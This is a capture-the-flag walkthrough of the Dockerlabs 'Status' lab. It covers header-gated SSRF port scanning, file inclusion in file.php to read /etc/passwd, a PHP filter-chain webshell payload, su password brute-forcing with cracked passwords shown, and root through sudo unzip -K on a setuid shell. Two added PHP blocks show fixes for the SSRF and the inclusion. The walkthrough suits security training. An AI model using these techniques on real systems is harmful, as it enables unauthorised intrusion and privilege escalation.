
Dockerlabs-Status

·496 words·3 minutes
Dockerlabs Dockerlabs Linux
Author: HYH
A tech enthusiast focused on cybersecurity, penetration testing and CTF challenges, who enjoys documenting hands-on experience, sharing tools and techniques, and is committed to continuous learning and growth.

Nmap

[root@kali] /home/kali/status  
❯ nmap 172.17.0.2 -A -p-               

PORT   STATE SERVICE VERSION
80/tcp open  http    Apache httpd 2.4.58 ((Ubuntu))
|_http-server-header: Apache/2.4.58 (Ubuntu)
|_http-title: Web Bunkeriana

Only port 80 is open.

Gobuster

[root@kali] /home/kali/status  
❯ gobuster dir -u http://172.17.0.2 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://172.17.0.2
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.6
[+] Extensions:              php
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/.php                 (Status: 403) [Size: 5197]
/status.php           (Status: 403) [Size: 5197]
/.php                 (Status: 403) [Size: 5197]
/server-status        (Status: 403) [Size: 5197]
Progress: 441120 / 441122 (100.00%)
===============================================================
Finished
===============================================================

There is a status.php, which returns a 403 status code.

The response headers contain a Statusid header with the value 0; try changing it to 1.

[root@kali] /home/kali/status  
❯ curl http://172.17.0.2/status.php -H "Statusid: 1"

<h1>Server Status</h1>
<p>200</p>

<h1>Check Status</h1>
<form method="POST">
    <input type="url" name="url" placeholder="http://example.com" required>
    <button>Send</button>
</form>



<footer style="position: fixed; bottom: 10px; right: 10px; font-size: 0.9em; color: gray;">
    v0.2
</footer>

A url parameter can be submitted through the form.

SSRF

Files cannot be read directly through it, so the next step is to probe internal ports.

import requests

# The status checker only answers when the Statusid header is set to 1.
target = "http://172.17.0.2/status.php"

# Ask the checker to fetch every loopback port; the page reports
# "HTTP Status: 0" when nothing answered, so anything else means the
# port accepted a connection.
for port in range(1, 65536):
    url_to_check = f"http://127.0.0.1:{port}"
    payload = {'url': url_to_check}
    try:
        response = requests.post(url=target, data=payload, headers={'Statusid': '1'})
        if 'HTTP Status: 0' not in response.text:
            print(f"[+] Port open: {port}")
    except Exception:
        continue
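The reason the sweep works is that the checker connects to whatever host and port the url parameter names. The following is an added example, not the lab's status.php (the writeup does not show its source); it assumes the handler fetches the submitted url and reports the response code, and shows the checks that would stop loopback and internal targets:

```php
<?php
// Added example, not the lab's status.php (whose source the writeup does not
// show). Assumed: the handler fetches the submitted url and reports its code.

// True only for globally routable addresses: NO_PRIV_RANGE rejects RFC 1918
// space, NO_RES_RANGE rejects loopback, link-local and other reserved ranges.
function is_public_address(string $ip): bool
{
    return filter_var($ip, FILTER_VALIDATE_IP,
        FILTER_FLAG_NO_PRIV_RANGE | FILTER_FLAG_NO_RES_RANGE) !== false;
}

// Returns the HTTP status of $url, or throws if the target is not allowed.
function check_status(string $url): int
{
    $p = parse_url($url);
    if ($p === false || !isset($p['scheme'], $p['host'])) {
        throw new InvalidArgumentException('malformed url');
    }
    $scheme = strtolower($p['scheme']);
    if (!in_array($scheme, ['http', 'https'], true)) {
        throw new InvalidArgumentException('scheme not allowed');
    }
    $port = $p['port'] ?? ($scheme === 'https' ? 443 : 80);
    if (!in_array($port, [80, 443], true)) {
        throw new InvalidArgumentException('port not allowed');  // stops the 1..65535 sweep
    }
    // Resolve once, check the address, then pin curl to it so a hostname that
    // resolves to 127.0.0.1 (or re-resolves later) cannot reach loopback.
    $ip = gethostbyname($p['host']);   // returns the name unchanged on failure: rejected below
    if (!is_public_address($ip)) {
        throw new InvalidArgumentException('destination not allowed');
    }
    $ch = curl_init($url);
    curl_setopt_array($ch, [
        CURLOPT_NOBODY         => true,
        CURLOPT_RETURNTRANSFER => true,
        CURLOPT_FOLLOWLOCATION => false,  // a redirect could point back inside
        CURLOPT_PROTOCOLS      => CURLPROTO_HTTP | CURLPROTO_HTTPS,
        CURLOPT_RESOLVE        => ["{$p['host']}:{$port}:{$ip}"],
        CURLOPT_CONNECTTIMEOUT => 3,
        CURLOPT_TIMEOUT        => 5,
    ]);
    curl_exec($ch);
    $code = (int) curl_getinfo($ch, CURLINFO_RESPONSE_CODE);
    curl_close($ch);
    return $code;
}
```

With these checks the url http://127.0.0.1:8080 is rejected before any connection is made, and a hostname that resolves to a private address is rejected as well.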

Visiting the page reveals a route, which yields a zip archive. After extracting it, a file.php that allows file inclusion is found.

[root@kali] /home/kali/status/backup_5025a3123660d066c9ba8617c0cd92d5/061400ca5d384de48f37a71ec23cc518/cc8e38c20e4e2f58291c0f8b2e3ace5f/dev  
❯ ls
file.php  status.php

[root@kali] /home/kali/status/backup_5025a3123660d066c9ba8617c0cd92d5/061400ca5d384de48f37a71ec23cc518/cc8e38c20e4e2f58291c0f8b2e3ace5f/dev  
❯ cat file.php  
<?php 
if($_SERVER['REQUEST_METHOD'] === 'GET'){
    $file = $_GET['72e22dffd7fa10883a85aa3e0bbbd6d4'];
    include($file);
}
?>#                    

Include

/etc/passwd can be read with the following request:

http://172.17.0.2/061400ca5d384de48f37a71ec23cc518/cc8e38c20e4e2f58291c0f8b2e3ace5f/dev/file.php?72e22dffd7fa10883a85aa3e0bbbd6d4=/etc/passwd

root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/run/ircd:/usr/sbin/nologin
_apt:x:42:65534::/nonexistent:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
ubuntu:x:1000:1000:Ubuntu:/home/ubuntu:/bin/bash
baluton:x:1001:1001:baluton,,,:/home/baluton:/bin/bash
_galera:x:100:65534::/nonexistent:/usr/sbin/nologin
mysql:x:101:102:MariaDB Server,,,:/nonexistent:/bin/false
redghost:x:1002:1002:redghost,,,:/home/redghost:/bin/bash

Try using PHP filter chains to achieve command execution.

[root@kali] /home/kali/Desktop/php_filter_chain_generator (main) 
❯ python php_filter_chain_generator.py --chain '<?php system($_GET["a"]);?>'
[+] The following gadget chain will generate the following code : <?php system($_GET["a"]);?> (base64 value: PD9waHAgc3lzdGVtKCRfR0VUWyJhIl0pOz8+)
php://filter/convert.iconv.UTF8.CSISO2022KR|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.UTF16|convert.iconv.WINDOWS-1258.UTF32LE|convert.iconv.ISIRI3342.ISO-IR-157|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.ISO2022KR.UTF16|convert.iconv.L6.UCS2|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.865.UTF16|convert.iconv.CP901.ISO6937|convert.base64-decode|convert.base64-encode|convert.iconv.
<skip>

This gives a reverse shell.
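Both the /etc/passwd read and the filter chain rely on file.php passing the raw GET value to include(). The following is an added example, not the lab's file.php, showing the same handler with the include target taken from an allowlist and confirmed to live under a fixed directory (the pages directory and the logical name are assumptions; the parameter name is the one from the lab):

```php
<?php
// Added example, not the lab's file.php: same GET handler, but the include
// target comes from an allowlist resolved under a fixed directory.
// Assumed: the includable files live in ./pages; "status" is a made-up name.

const INCLUDE_DIR = __DIR__ . '/pages';
const ALLOWED     = ['status' => 'status.php'];  // logical name => file

function resolve_include(string $name): ?string
{
    // 1. Only allowlisted names: a path like /etc/passwd or a stream wrapper
    //    like php://filter/... is never handed to include().
    if (!array_key_exists($name, ALLOWED)) {
        return null;
    }
    // 2. Canonicalise and confirm the file really sits under INCLUDE_DIR so a
    //    symlink or traversal in the allowlisted file cannot escape it.
    $base = realpath(INCLUDE_DIR);
    $path = realpath(INCLUDE_DIR . '/' . ALLOWED[$name]);
    if ($base === false || $path === false
        || strncmp($path, $base . '/', strlen($base) + 1) !== 0) {
        return null;
    }
    return $path;
}

if ($_SERVER['REQUEST_METHOD'] === 'GET') {
    $path = resolve_include((string) ($_GET['72e22dffd7fa10883a85aa3e0bbbd6d4'] ?? ''));
    if ($path === null) {
        http_response_code(404);
        exit;
    }
    include $path;
}
```

Note that allow_url_include=Off would not have stopped the chain above: php://filter is a local wrapper, so only refusing to pass attacker-controlled strings to include() closes it.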

SuForce

Nothing exploitable was found, so brute-force the user passwords.

www-data@f0f1168fc905:/var/www/html$ ./suForce -u baluton -w rockyou.txt 
            _____                          
 ___ _   _ |  ___|__  _ __ ___ ___   
/ __| | | || |_ / _ \| '__/ __/ _ \ 
\__ \ |_| ||  _| (_) | | | (_|  __/  
|___/\__,_||_|  \___/|_|  \___\___|  
───────────────────────────────────
 code: d4t4s3c     version: v1.0.0
───────────────────────────────────
🎯 Username | baluton
📖 Wordlist | rockyou.txt
🔎 Status   | 40/14344392/0%/123123
💥 Password | 123123
───────────────────────────────────

baluton@f0f1168fc905:/var/www/html$ ./suForce -u redghost -w rockyou.txt 
            _____                          
 ___ _   _ |  ___|__  _ __ ___ ___   
/ __| | | || |_ / _ \| '__/ __/ _ \ 
\__ \ |_| ||  _| (_) | | | (_|  __/  
|___/\__,_||_|  \___/|_|  \___\___|  
───────────────────────────────────
 code: d4t4s3c     version: v1.0.0
───────────────────────────────────
🎯 Username | redghost
📖 Wordlist | rockyou.txt
🔎 Status   | 104/14344392/0%/estrella
💥 Password | estrella
───────────────────────────────────

Root

This is similar to Bola: unzip can be run as root, and with -K it keeps the setuid bit on the extracted file.

baluton@8470eb7f0e97:/home$ sudo -l
Matching Defaults entries for baluton on 8470eb7f0e97:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin, use_pty

User baluton may run the following commands on 8470eb7f0e97:
    (ALL) NOPASSWD: /usr/bin/unzip

baluton@8470eb7f0e97:~$ cp /bin/sh .
baluton@8470eb7f0e97:~$ chmod +s sh
baluton@8470eb7f0e97:~$ zip shell.zip sh
  adding: sh (deflated 52%)
baluton@8470eb7f0e97:~$ sudo unzip -K shell.zip
Archive:  shell.zip
replace sh? [y]es, [n]o, [A]ll, [N]one, [r]ename: y
  inflating: sh                      
baluton@8470eb7f0e97:~$ ./sh -p
# id
uid=1001(baluton) gid=1001(baluton) euid=0(root) egid=0(root) groups=0(root),100(users),1001(baluton)

Alternatively, extract the zip archive in the root directory, which also contains the password.

baluton@8470eb7f0e97:~$ cat regalitoregalazoregalin.txt 
root:balulonbalulinbalutonjeje
baluton@8470eb7f0e97:~$ su root
Password: 
root@8470eb7f0e97:/home/baluton# 